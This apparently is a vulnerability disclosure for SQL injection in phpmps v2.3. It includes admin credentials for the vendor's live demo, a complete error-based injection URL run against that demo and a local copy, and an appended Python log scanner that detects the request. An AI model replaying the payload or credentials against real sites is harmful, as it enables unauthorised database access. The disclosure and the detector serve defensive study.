### Brief description:
Generic SQL injection in phpmps (tested successfully against the demo site)
### Details:
Download URL for the affected version:
http://www.phpmps.com/down/phpmps_v2.3_build140305_utf8.zip
[![screenshot](https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg)](https://images.seebug.org/upload/201407/101519046a1565bda45f6e7e546e8eecba35a2f9.jpg)
http://www.phpmps.com/demo/admin/login.php
Logged in successfully with admin/gxy123123:
SQL injection exploit:
http://www.phpmps.com/demo/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
[![payonline injection.jpg](https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg)](https://images.seebug.org/upload/201407/10154023eb48a6ef6c4f36f4a1609f1411383396.jpg)
### Proof of vulnerability:
Reproduced successfully in a locally built environment as well:
http://localhost/phpmps_v2.3_build140305_utf8/upload/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(database(),0x7c,user(),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
[![screenshot](https://images.seebug.org/upload/201407/10154317af14d03575764f7182435342dd2fb648.jpg)](https://images.seebug.org/upload/201407/10154317af14d03575764f7182435342dd2fb648.jpg)
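
A log check for the request shown above, as an added example that is not part of the original report or of phpmps: it flags requests whose path continues after a `.php` script name or whose `table` parameter is not a plain identifier. The log lines, the `pay_log` table name and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2014:15:40:23 +0800] "GET /demo/admin/payonline.php/login.php'
    '?table=information_schema.SCHEMATA%20where%201=(select%201)%23 HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Jul/2014:15:41:02 +0800] "GET /demo/admin/payonline.php'
    '?table=pay_log HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Jul/2014:15:41:30 +0800] "GET /demo/admin/login.php HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
IDENTIFIER_RE = re.compile(r'[A-Za-z0-9_]+')   # what a bare table name looks like
SCRIPT_PATHINFO_RE = re.compile(r'\.php/.')    # extra path segment after a script


def inspect_request(target):
    """Return the reasons a request target resembles the request in the report."""
    parts = urlsplit(target)
    reasons = []
    if SCRIPT_PATHINFO_RE.search(parts.path):
        reasons.append("path continues after a .php script")
    # parse_qs percent-decodes values, so %20, %23 etc. are seen as real characters.
    for value in parse_qs(parts.query, keep_blank_values=True).get("table", []):
        if not IDENTIFIER_RE.fullmatch(value):
            reasons.append("table parameter is not a plain identifier")
    return reasons


def scan(lines):
    """Return (path, reasons) for every log line that trips at least one check."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = inspect_request(match.group(1))
        if reasons:
            findings.append((urlsplit(match.group(1)).path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in scan(SAMPLE_LOG):
        print(path, "->", "; ".join(reasons))
```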